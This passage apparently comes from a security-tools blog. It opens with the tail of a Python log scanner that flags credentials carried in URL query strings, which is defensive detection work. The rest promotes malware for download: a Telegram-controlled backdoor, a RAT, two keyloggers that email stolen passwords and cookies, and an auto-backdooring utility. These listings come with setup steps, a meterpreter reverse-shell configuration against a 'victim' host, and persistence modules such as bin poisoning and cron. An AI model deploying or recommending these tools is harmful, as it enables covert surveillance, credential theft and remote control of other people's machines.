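    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names that should never travel in a URL.  Constructed list; tune it.
# "email" is left out on purpose: it is common in legitimate GET requests.
SENSITIVE_PARAMS = {"password", "passwd", "pass", "pwd", "cookies", "cookie", "token"}


def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_LOG.match(line)
    return m.groupdict() if m else None


def find_credential_exfil(lines, sensitive=SENSITIVE_PARAMS):
    """Return (ip, path, [matched parameter names]) for requests carrying a
    sensitive parameter in the query string, whatever the method."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        params = parse_qs(parts.query, keep_blank_values=True)
        hit = sorted(k for k in params if k.lower() in sensitive)
        if hit:
            findings.append((rec["ip"], parts.path, hit))
    return findings


# Constructed sample access log (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Nov/2017:10:21:06 -0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Nov/2017:10:21:09 -0300] "GET /collect.php?email=victim%40example.com'
    '&password=hunter2&cookies=sid%3Dabc&userAgent=Mozilla HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Nov/2017:10:22:00 -0300] "GET /search?q=password+reset HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Nov/2017:10:22:30 -0300] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, params in find_credential_exfil(SAMPLE_LOG):
        print(f"{ip} {path} carries {', '.join(params)} in the query string")
```

The search is on parameter names, not values, so a legitimate search for the word "password" (third line) is not flagged while the collector request (second line) is; on a proxy log the same check finds the outbound request from the infected browser.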
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/fbctf/cromos" rel="nofollow" target="_blank">Download Cromos</a></span></b></div>
<br /><b>BrainDamage - A fully featured backdoor that uses Telegram as a C&C server</b> (2017-03-15)<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-12VckHz9YI0/WL35eBXU_bI/AAAAAAAAHYw/m3EG4B-Q81gRjn8b600JPewj9iTxdkplACLcB/s1600/BrainDamage_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="514" src="https://3.bp.blogspot.com/-12VckHz9YI0/WL35eBXU_bI/AAAAAAAAHYw/m3EG4B-Q81gRjn8b600JPewj9iTxdkplACLcB/s640/BrainDamage_01.jpg" width="640" /></a></div>
<br />
A python based backdoor which uses <a href="https://telegram.org/" target="_blank"> Telegram </a> as C&C server.<br />
<br />
<pre><code> /\
/_.\
_,.-'/ `",\'-.,_
-~^ /______\`~~-^~:
____ _ _____
| _ \ (_) | __ \
| |_) |_ __ __ _ _ _ __ | | | | __ _ _ __ ___ __ _ __ _ ___
| _ <| '__/ _` | | '_ \| | | |/ _` | '_ ` _ \ / _` |/ _` |/ _ \
| |_) | | | (_| | | | | | |__| | (_| | | | | | | (_| | (_| | __/
|____/|_| \__,_|_|_| |_|_____/ \__,_|_| |_| |_|\__,_|\__, |\___|
__/ |
|___/
--> Coded by: Mehul Jain(mehulj94@gmail.com)
--> Github: https://github.com/mehulj94
--> Twitter: https://twitter.com/wayfarermj
--> For windows only
______ _
| ____| | |
| |__ ___ __ _| |_ _ _ _ __ ___ ___
| __/ _ \/ _` | __| | | | '__/ _ \/ __|
| | | __/ (_| | |_| |_| | | | __/\__ \
|_| \___|\__,_|\__|\__,_|_| \___||___/
--> Persistance
--> USB spreading
--> Port Scanner
--> Router Finder
--> Run shell commands
--> Keylogger
--> Insert keystrokes
--> Record audio
--> Webserver
--> Screenshot logging
--> Download files in the host
--> Execute shutdown, restart, logoff, lock
--> Send drive tree structure
--> Set email template
--> Rename Files
--> Change wallpaper
--> Open website
--> Send Password for
• Chrome
• Mozilla
• Filezilla
• Core FTP
• CyberDuck
• FTPNavigator
• WinSCP
• Outlook
• Putty
• Skype
• Generic Network
--> Cookie stealer
--> Send active windows
--> Gather system information
• Drives list
• Internal and External IP
• Ipconfig /all output
• Platform</code></pre>
<br />
<span style="font-size: large;"> <b> Setup </b> </span> <br />
<ul>
<li> Telegram setup: <ul>
<li> Install <a href="https://telegram.org/" target="_blank"> Telegram </a> app and search for "BOTFATHER". </li>
<li> Type /help to see all possible commands. </li>
<li> Click on or type /newbot to create a new bot. </li>
<li> Name your bot. </li>
<li> You should see a new API token generated for it. </li>
</ul>
</li>
<li> Dedicated Gmail account. Remember to check "allow connection from less secure apps" in gmail settings. </li>
<li> Set access_token in eclipse.py to token given by the botfather. </li>
<li> Set CHAT_ID in eclipse.py. Send a message to the bot from the app, then call the Telegram Bot API's getUpdates method to read the chat id from the resulting update. </li>
</ul>
<blockquote>
bot.getMe() will give output {'first_name': 'Your Bot', 'username': 'YourBot', 'id': 123456789} </blockquote>
<ul>
<li> Set copied_startup_filename in Eclipse.py. </li>
<li> Set Gmail password and Username in /Breathe/SendData.py </li>
</ul>
<br />
<span style="font-size: large;"> <b> Abilities </b> </span> <br />
<ul>
<li> whoisonline- list active slaves <br />
<blockquote>
This command will list all the active slaves. </blockquote>
</li>
<li> destroy- delete&clean up <br />
<blockquote>
This command will remove the stub from host and will remove registry entries. </blockquote>
</li>
<li> cmd- execute command on CMD <br />
<blockquote>
Runs shell commands on the host. </blockquote>
</li>
<li> download- url (startup, desktop, default) <br />
<blockquote>
This will download files in the host computer. </blockquote>
</li>
<li> execute- shutdown, restart, logoff, lock <br />
<blockquote>
Performs the chosen action on the host. </blockquote>
</li>
<li> screenshot- take screenshot <br />
<blockquote>
Takes a screenshot of the host computer. </blockquote>
</li>
<li> send- passwords, drivetree, driveslist, keystrokes, openwindows <br />
<blockquote>
This command sends passwords (saved browser passwords, FTP, Putty...), the directory tree of the host (up to level 2), logged keystrokes and the windows which are currently open. </blockquote>
</li>
<li> set- email (0:Default,1:URL,2:Update), filename (0: Itself, 1: Others), keystrokes (text) <br />
<blockquote>
This command can set email template (default, download from url, update current template with text you'll send), rename filenames or insert keystrokes in host. </blockquote>
</li>
<li> start- website (URL), keylogger, recaudio (time), webserver (Port), spread <br />
<blockquote>
This command can open a website, start the keylogger, record audio, start the webserver or begin USB spreading. </blockquote>
</li>
<li> stop- keylogger, webserver <br />
<blockquote>
This command will stop keylogger or webserver </blockquote>
</li>
<li> wallpaper- change wallpaper (URL) <br />
<blockquote>
Changes wallpaper of host computer </blockquote>
</li>
<li> find- openports (host, threads, ports), router <br />
<blockquote>
This command will find open ports and the router the host is using </blockquote>
</li>
<li> help- print this usage <br />
</li>
</ul>
<br />
<span style="font-size: large;"> <b> Requirements </b> </span> <br />
<ul>
<li> <a href="https://github.com/nickoala/telepot" target="_blank"> Telepot </a> </li>
<li> <a href="https://people.csail.mit.edu/hubert/pyaudio/" target="_blank"> PyAudio </a> </li>
<li> <a href="http://www.voidspace.org.uk/python/modules.shtml#pycrypto" target="_blank"> PyCrypto </a> </li>
<li> <a href="https://pypi.python.org/pypi/pyasn1" target="_blank"> Pyasn1 </a> </li>
<li> <a href="https://pillow.readthedocs.io/en/latest/installation.html" target="_blank"> Pillow </a> </li>
<li> Install <a href="https://sourceforge.net/projects/pyhook/" target="_blank"> PyHook </a> </li>
<li> Install <a href="https://sourceforge.net/projects/pywin32/" target="_blank"> PyWin32 </a> </li>
<li> Install <a href="https://www.microsoft.com/en-us/download/details.aspx?id=44266" target="_blank"> Microsoft Visual C++ Compiler for Python </a> </li>
<li> Install <a href="http://www.pyinstaller.org/" target="_blank"> PyInstaller </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> Screenshots </b> </span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zz2EsMT1CGA/WL35t6cNX3I/AAAAAAAAHY0/xfrh0qKQOTY6RyAILIhs-zfBTtCrilamwCLcB/s1600/BrainDamage_02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://3.bp.blogspot.com/-zz2EsMT1CGA/WL35t6cNX3I/AAAAAAAAHY0/xfrh0qKQOTY6RyAILIhs-zfBTtCrilamwCLcB/s640/BrainDamage_02.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-xtd2jgP65wo/WL35ucG-a6I/AAAAAAAAHY8/sxvojqo1kVsHj3fBMKndWNIQsqucdEi4gCLcB/s1600/BrainDamage_03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-xtd2jgP65wo/WL35ucG-a6I/AAAAAAAAHY8/sxvojqo1kVsHj3fBMKndWNIQsqucdEi4gCLcB/s640/BrainDamage_03.jpg" width="462" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-vyQY6NenMOU/WL35uLKHJPI/AAAAAAAAHY4/p2B46F4MTIMOzer-WBXfHZkuZ3TSuWdCwCLcB/s1600/BrainDamage_04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://4.bp.blogspot.com/-vyQY6NenMOU/WL35uLKHJPI/AAAAAAAAHY4/p2B46F4MTIMOzer-WBXfHZkuZ3TSuWdCwCLcB/s640/BrainDamage_04.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-jHGfbYrBHSw/WL35ub0esFI/AAAAAAAAHZA/TxnrherTI6gNdBM7SVXpEtiWKTOag9QSQCLcB/s1600/BrainDamage_05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="580" src="https://3.bp.blogspot.com/-jHGfbYrBHSw/WL35ub0esFI/AAAAAAAAHZA/TxnrherTI6gNdBM7SVXpEtiWKTOag9QSQCLcB/s640/BrainDamage_05.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-0ikk1krT0go/WL35uuBT9dI/AAAAAAAAHZE/G1_5tZ3DU_EPCPeVbdcB9FUg_YEkGJ4hQCLcB/s1600/BrainDamage_06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://4.bp.blogspot.com/-0ikk1krT0go/WL35uuBT9dI/AAAAAAAAHZE/G1_5tZ3DU_EPCPeVbdcB9FUg_YEkGJ4hQCLcB/s640/BrainDamage_06.png" width="640" /></a></div>
<br />
For educational purposes only, use at your own responsibility. <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/mehulj94/BrainDamage" target="_blank"> Download BrainDamage </a> </span> </b> </div>
<br /><b>Stitch - Python Remote Administration Tool (RAT)</b> (2017-03-06)<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-4OxHntgJi68/WLJ1jMhCLSI/AAAAAAAAHV0/jVt4UbMc82AtYVdkDAwSLGZVcIpBDxJ6gCLcB/s1600/Stitch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://4.bp.blogspot.com/-4OxHntgJi68/WLJ1jMhCLSI/AAAAAAAAHV0/jVt4UbMc82AtYVdkDAwSLGZVcIpBDxJ6gCLcB/s640/Stitch.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is a cross-platform Python framework which lets you build custom payloads for Windows, Mac OSX and Linux. You can choose whether the payload connects to a specific IP and port or listens for a connection on a port, whether to send an email of system info when the system boots, and whether to start the keylogger on boot. Payloads can only run on the OS they were created on.</div>
<br />
<span style="font-size: large;"> <b> Features </b> </span> <br />
<br />
<b> Cross Platform Support </b> <br />
<ul>
<li> Command and file auto-completion </li>
<li> Antivirus detection </li>
<li> Able to turn off/on display monitors </li>
<li> Hide/unhide files and directories </li>
<li> View/edit the hosts file </li>
<li> View all the systems environment variables </li>
<li> Keylogger with options to view status, start, stop and dump the logs onto your host system </li>
<li> View the location and other information of the target machine </li>
<li> Execute custom python scripts which return whatever you print to screen </li>
<li> Screenshots </li>
<li> Virtual machine detection </li>
<li> Download/Upload files to and from the target system </li>
<li> Attempt to dump the systems password hashes </li>
<li> Payloads' properties are "disguised" as other known programs </li>
</ul>
<br />
<b> Windows Specific </b> <br />
<ul>
<li> Display a user/password dialog box to obtain user password </li>
<li> Dump passwords saved via Chrome </li>
<li> Clear the System, Security, and Application logs </li>
<li> Enable/Disable services such as RDP,UAC, and Windows Defender </li>
<li> Edit the accessed, created, and modified properties of files </li>
<li> Create a custom popup box </li>
<li> View connected webcam and take snapshots </li>
<li> View past connected wifi connections along with their passwords </li>
<li> View information about drives connected </li>
<li> View summary of registry values such as DEP </li>
</ul>
<br />
<b> Mac OSX Specific </b> <br />
<ul>
<li> Display a user/password dialog box to obtain user password </li>
<li> Change the login text at the user's login screen </li>
<li> Webcam snapshots </li>
</ul>
<br />
<b> Mac OSX/Linux Specific </b> <br />
<ul>
<li> SSH from the target machine into another host </li>
<li> Run sudo commands </li>
<li> Attempt to bruteforce the user's password using the passwords list found in Tools/ </li>
<li> Webcam snapshots (untested on Linux) </li>
</ul>
<br />
<span style="font-size: large;"> <b> Implemented Transports </b> </span> <br />
All communication between the host and target is AES encrypted. Every Stitch installation generates an AES key which is then embedded in all payloads it builds; a payload only accepts a connection when the keys match. To connect from a different system running Stitch, export the key with the showkey command on the original system and import it with the addkey command on the new one. Because the key is stored inside every payload, anyone who obtains a copy of a payload can recover it, so the encryption keeps passive observers out of the channel but does not protect it from whoever holds a payload. <br />
<br />
<span style="font-size: large;"> <b> Implemented Payload Installers </b> </span> <br />
The "stitchgen" command gives the user the option to create <a href="http://nsis.sourceforge.net/Main_Page" target="_blank"> NSIS </a> installers on Windows and <a href="http://stephanepeter.com/makeself/" target="_blank"> Makeself </a> installers on POSIX machines. For Windows, the installer packages the payload together with an elevation exe, which prevents the firewall prompt and adds persistence, and places the payload on the system. For Mac OSX and Linux, the installer places the payload and attempts to add persistence. To create NSIS installers you must <a href="http://nsis.sourceforge.net/Download" target="_blank"> download </a> and install NSIS. <br />
<br />
<span style="font-size: large;"> <b> Wiki </b> </span> <br />
<ul>
<li> <a href="https://github.com/nathanlopez/Stitch/wiki/Crash-Course" target="_blank"> Crash Course of Stitch </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> Requirements </b> </span> <br />
<ul>
<li> <a href="https://www.python.org/downloads/" target="_blank"> Python 2.7 </a> </li>
</ul>
For easy installation run the following command that corresponds to your OS: <br />
<pre><code># for Windows
pip install -r win_requirements.txt
# for Mac OSX
pip install -r osx_requirements.txt
# for Linux
pip install -r lnx_requirements.txt</code></pre>
<ul>
<li> <a href="https://pypi.python.org/pypi/pycrypto" target="_blank"> Pycrypto </a> </li>
<li> <a href="http://docs.python-requests.org/en/master/" target="_blank"> Requests </a> </li>
<li> <a href="https://pypi.python.org/pypi/colorama" target="_blank"> Colorama </a> </li>
<li> <a href="https://pypi.python.org/pypi/PIL" target="_blank"> PIL </a> </li>
</ul>
<br />
<b> Windows Specific </b> <br />
<ul>
<li> <a href="http://www.py2exe.org/" target="_blank"> Py2exe </a> </li>
<li> <a href="https://sourceforge.net/projects/pywin32/" target="_blank"> pywin32 </a> </li>
</ul>
<br />
<b> Mac OSX Specific </b> <br />
<ul>
<li> <a href="https://pythonhosted.org/pyobjc/" target="_blank"> PyObjC </a> </li>
</ul>
<br />
<b> Mac OSX/Linux Specific </b> <br />
<ul>
<li> <a href="http://www.pyinstaller.org/" target="_blank"> PyInstaller </a> </li>
<li> <a href="https://pexpect.readthedocs.io/en/stable/" target="_blank"> pexpect </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> To Run </b> </span> <br />
<pre><code>python main.py
or
./main.py</code></pre>
<br />
<span style="font-size: large;"> <b> Motivation </b> </span> <br />
My motivation behind this was to advance my knowledge of python, hacking, and just to see what I could accomplish. Was somewhat discouraged and almost abandoned this project when I found the amazing work done by <a href="https://github.com/n1nj4sec/pupy" target="_blank"> n1nj4sec </a> , but still decided to put this up since I had already come so far. <br />
<br />
<span style="font-size: large;"> <b> Other open-source Python RATs for Reference </b> </span> <br />
<ul>
<li> <a href="https://github.com/vesche/basicRAT" target="_blank"> vesche/basicRAT </a> </li>
<li> <a href="https://github.com/n1nj4sec/pupy" target="_blank"> n1nj4sec/pupy </a> </li>
</ul>
<br />
<span style="font-size: large;"> <b> Screenshots </b> </span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-G-lZ3PiTPVM/WLJ1t3kOHnI/AAAAAAAAHWA/PQEwTPH6rX4G3jpjeCKeKP7J0KWW2rLMwCLcB/s1600/Stitch2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="462" src="https://3.bp.blogspot.com/-G-lZ3PiTPVM/WLJ1t3kOHnI/AAAAAAAAHWA/PQEwTPH6rX4G3jpjeCKeKP7J0KWW2rLMwCLcB/s640/Stitch2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CkdzEFwEMK8/WLJ1tgcjgwI/AAAAAAAAHV4/gCIwhZTo_zE-JW0OZ6UrGbsDR-zZuh70QCLcB/s1600/Stitch3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://4.bp.blogspot.com/-CkdzEFwEMK8/WLJ1tgcjgwI/AAAAAAAAHV4/gCIwhZTo_zE-JW0OZ6UrGbsDR-zZuh70QCLcB/s640/Stitch3.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/--m7PYDshG6Y/WLJ1t_UPCFI/AAAAAAAAHV8/A6dA72z5PYU2n_SbXx5UfwQcA4iPeTibACLcB/s1600/Stitch4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://1.bp.blogspot.com/--m7PYDshG6Y/WLJ1t_UPCFI/AAAAAAAAHV8/A6dA72z5PYU2n_SbXx5UfwQcA4iPeTibACLcB/s640/Stitch4.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/nathanlopez/Stitch" target="_blank"> Download Stitch </a> </span> </b> </div>
<br />
<b><span style="font-size: x-large;">BeeLogger - Generate Emailing Keyloggers to Windows on Linux</span></b> (2017-02-20)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-GFAfx38LpE4/WKfgN7KI1SI/AAAAAAAAHTQ/XrJPPCTEwSwt9cADnmxPPOhbl3IjtrN6gCLcB/s1600/beelogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="https://2.bp.blogspot.com/-GFAfx38LpE4/WKfgN7KI1SI/AAAAAAAAHTQ/XrJPPCTEwSwt9cADnmxPPOhbl3IjtrN6gCLcB/s640/beelogger.png" width="640" /></a></div>
<br />
Generates keyloggers for Windows, built on Linux, that send their logs via Gmail. The keylogger is written in Python and compiled with PyInstaller.<br />
<br />
<span style="font-size: large;"> <b> Features </b> </span> <br />
<ul>
<li> Sends logs every 120 seconds. </li>
<li> Sends logs once more than 50 characters have been captured (chars &gt; 50). </li>
<li> Sends logs via Gmail. </li>
<li> Some phishing methods are included. </li>
<li> Multiple sessions disabled. </li>
<li> Bypasses UAC.</li>
</ul>
<b> Prerequisites </b> <br />
<ul>
<li> apt </li>
<li> wine </li>
<li> wget </li>
<li> Linux </li>
<li> sudo </li>
<li> python2.7 </li>
<li> python 2.7 on Wine Machine </li>
<li> pywin32 on Wine Machine </li>
<li> pythoncom on Wine Machine </li>
</ul>
<br />
<b> Tested on: </b> <br />
<ul>
<li> Kali Linux - SANA </li>
<li> Kali Linux - ROLLING </li>
<li> Ubuntu 14.04-16.04 LTS </li>
<li> Debian 8.5 </li>
<li> Linux Mint 18.1 </li>
</ul>
<br />
<b> Cloning: </b> <br />
<pre><code>git clone https://github.com/4w4k3/BeeLogger.git</code></pre>
<br />
<b> Running: </b> <br />
<pre><code>sudo python bee.py</code></pre>
If you have another version of Python: <br />
<pre><code>sudo python2.7 bee.py</code></pre>
<br />
<b> Contact: </b> <br />
<strong> <a href="mailto:4w4k3@protonmail.com" target="_blank"> 4w4k3@protonmail.com </a> </strong> <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/4w4k3/BeeLogger" target="_blank"> Download BeeLogger </a> </span> </b> </div>
<br />
<b><span style="font-size: x-large;">Radium-Keylogger - Python keylogger with multiple features</span></b> (2016-11-04)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-3oyWaQE322o/WBj2GMBxR4I/AAAAAAAAGc0/DgBkuQ5Q1Qo8LzA9X4mN3aZB-kIyzmXvwCLcB/s1600/Radium-Keylogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://4.bp.blogspot.com/-3oyWaQE322o/WBj2GMBxR4I/AAAAAAAAGc0/DgBkuQ5Q1Qo8LzA9X4mN3aZB-kIyzmXvwCLcB/s640/Radium-Keylogger.png" width="640" /></a></div>
<br />
<span class="repository-meta-content">Python keylogger with multiple features.</span><br />
<b><span style="font-size: large;">Features</span></b><br />
<ul>
<li>Applications and keystrokes logging</li>
<li>Screenshot logging</li>
<li>Drive tree structure</li>
<li>Logs sending by email</li>
<li>Password Recovery for</li>
<ul>
<li>Chrome</li>
<li>Mozilla</li>
<li>Filezilla</li>
<li>Core FTP</li>
<li>CyberDuck</li>
<li>FTPNavigator</li>
<li>WinSCP</li>
<li>Outlook</li>
<li>Putty</li>
<li>Skype</li>
<li>Generic Network</li>
</ul>
<li>Cookie stealer</li>
<li>Keylogger stub update mechanism</li>
<li>Gather system information</li>
<ul>
<li>Internal and External IP</li>
<li>Ipconfig /all output</li>
<li>Platform</li>
</ul>
</ul>
<div>
<br /></div>
<b><span style="font-size: large;">Usage</span></b><br />
<ul>
<li>Download any libraries you are missing.</li>
<li>Set the Gmail username and password, and remember to enable "Allow less secure apps" in the Gmail settings.</li>
<li>Set the FTP server. Create a folder named Radium in which you'll store the new version of the exe.</li>
<li>Set the FTP IP, username and password.</li>
<li>Remember to encode the password in base64.</li>
<li>Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.</li>
<li>Build the exe using PyInstaller.</li>
<li>Keylogs are mailed after every 300 keystrokes. This can be changed.</li>
<li>A screenshot is taken after every 500 keystrokes. This can be changed.</li>
<li>Remember: if you build this into an exe, change the variables "originalfilename" and "coppiedfilename" in the function copytostartup().</li>
<li>Remember: whatever name you give to "coppiedfilename" must also be given to checkfilename in deleteoldstub().</li>
</ul>
<br />
<b><span style="font-size: large;">Things to work on</span></b><br />
<ul>
<li>Persistence</li>
<li>Taking screenshots after a specific time. Making it keystrokes independent.</li>
<li>Webcam logging</li>
<li>Skype chat history stealer</li>
<li>Steam credential harvester</li>
</ul>
<br />
<br />
<span style="font-size: large;"> <b> Requirements </b> </span> <br />
<ul>
<li> Install <a href="https://sourceforge.net/projects/pyhook/" target="_blank"> PyHook </a> </li>
<li> Install <a href="https://sourceforge.net/projects/pywin32/" target="_blank"> PyWin32 </a> </li>
<li> Install <a href="https://www.microsoft.com/en-us/download/details.aspx?id=44266" target="_blank"> Microsoft Visual C++ Compiler for Python </a> </li>
<li> Install <a href="http://www.pyinstaller.org/" target="_blank"> PyInstaller</a></li>
</ul>
<br />
<span style="font-size: large;"> <b> Tutorial </b> </span> <br />
<center>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/T0h_427L8u4" width="640"></iframe></center>
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/mehulj94/Radium-Keylogger" target="_blank"> Download Radium-Keylogger </a> </span> </b> </div>
<br />
<b><span style="font-size: x-large;">BackdoorMe - Powerful Auto-Backdooring Utility</span></b> (2016-01-11)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fkodyOyo17I/Vo9JJ0rPbKI/AAAAAAAAFBc/CtjklEnDKKM/s1600/backdoorme.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="http://2.bp.blogspot.com/-fkodyOyo17I/Vo9JJ0rPbKI/AAAAAAAAFBc/CtjklEnDKKM/s640/backdoorme.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Backdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar Metasploit-style interface with tremendous extensibility. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded. To set up SSH, please see here: <a href="https://help.ubuntu.com/community/SSH/OpenSSH/Configuring" target="_blank"> https://help.ubuntu.com/community/SSH/OpenSSH/Configuring </a> </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Please only use Backdoorme with explicit permission - please don't hack without asking.</div>
<br />
<div style="text-align: justify;">
<span style="font-size: large;"> <b> Usage </b> </span> </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Backdoorme comes with a number of built-in backdoors, modules, and auxiliary modules. Backdoors are specific components to create and deploy a specific backdoor, such as a netcat backdoor or msfvenom backdoor. Modules can be applied to any backdoor, and are used to make backdoors more potent, stealthy, or more readily tripped. Auxiliaries are useful operations that could be performed to help persistence. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To start backdoorme, first ensure that you have the required dependencies. </div>
<div>
<pre style="text-align: justify;"><code>$ python dependencies.py</code></pre>
</div>
<div style="text-align: justify;">
Launching backdoorme: </div>
<pre><code>$ python master.py
   ___           __       __           __  ___
  / _ )___ _____/ /_____/ /__  ___  ____/  |/  /__
 / _  / _ `/ __/ '_/ _  / _ \/ _ \/ __/ /|_/ / -_)
/____/\_,_/\__/_/\_\\_,_/\___/\___/_/  /_/ /_/\__/

Welcome to BackdoorMe, a powerful backdooring utility.
Type "help" to see the list of available commands.
Type "addtarget" to set a target, and "open" to open an SSH connection to that target.
Using local IP of 10.1.0.1.
&gt;&gt; </code></pre>
To add a target: <br />
<pre><code>&gt;&gt; addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
&gt;&gt; </code></pre>
<br />
<b> Backdoors </b> <br />
To use a backdoor, simply run the "use" keyword. <br />
<pre><code>&gt;&gt; use metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) &gt;&gt; </code></pre>
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword. <br />
<pre><code>(msf) &gt;&gt; show options

Backdoor options:

    Option     Value                               Description                        Required
    ------     -----                               -----------                        --------
    name       initd                               name of the backdoor               False
    format     elf                                 format to write the backdoor to    True
    lhost      10.1.0.1                            local IP to connect back to        True
    encoder    none                                encoder to use for the backdoor    False
    lport      4444                                local port to connect back on      True
    payload    linux/x86/meterpreter/reverse_tcp   payload to deploy in backdoor      True

(msf) &gt;&gt; set name apache
+ name =&gt; apache
(msf) &gt;&gt; show options

Backdoor options:

    Option     Value       Description             Required
    ------     -----       -----------             --------
    name       apache      name of the backdoor    False
    ...
</code></pre>
Currently enabled backdoors include: <br />
<ul>
<li> Bash </li>
<li> Bash2 (more reliable) </li>
<li> Metasploit </li>
<li> Netcat </li>
<li> Netcat-traditional </li>
<li> Perl </li>
<li> Php (does not automatically install a web server, but use the web module!) </li>
<li> Pupy </li>
<li> Python </li>
<li> Web (php - not the same backdoor as the above php backdoor) </li>
</ul>
<br />
<b> Modules </b> <br />
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword. <br />
<pre><code>(msf) &gt;&gt; add poison
+ Poison module added
</code></pre>
Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options. <br />
<pre><code>(msf) &gt;&gt; help
...
Poison module options:

    Option      Value   Description                         Required
    ------      -----   -----------                         --------
    name        ls      name of command to poison           False
    location    /bin    where to put poisoned files into    False
</code></pre>
Currently enabled modules include: <br />
<ul>
<li> Poison <ul>
<li> Performs bin poisoning on the target computer: it compiles an executable that calls both a system utility and an existing backdoor. </li>
<li> For example, if the bin poisoning module is triggered with "ls", it compiles and installs a binary called "ls" that runs both an existing backdoor and the original "ls", so that ordinary use of the utility triggers the backdoor more frequently. </li>
</ul>
</li>
<li> Cron <ul>
<li> Adds an existing backdoor to the root user's crontab to run with a given frequency. <br /> </li>
</ul>
</li>
<li> Web <ul>
<li> Sets up a web server and places a web page which triggers the backdoor. </li>
<li> Simply visit the site with your listener open and the backdoor will begin. </li>
</ul>
</li>
<li> Keylogger <ul>
<li> Ships a keylogger to the target and starts it. </li>
<li> Given the option to email the results to you every hour. </li>
</ul>
</li>
<li> User <ul>
<li> Adds a new user to the target. </li>
</ul>
</li>
<li> Startup <ul>
<li> Allows for backdoors to be spawned with the bashrc and init files. </li>
</ul>
</li>
</ul>
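<div style="text-align: justify;">
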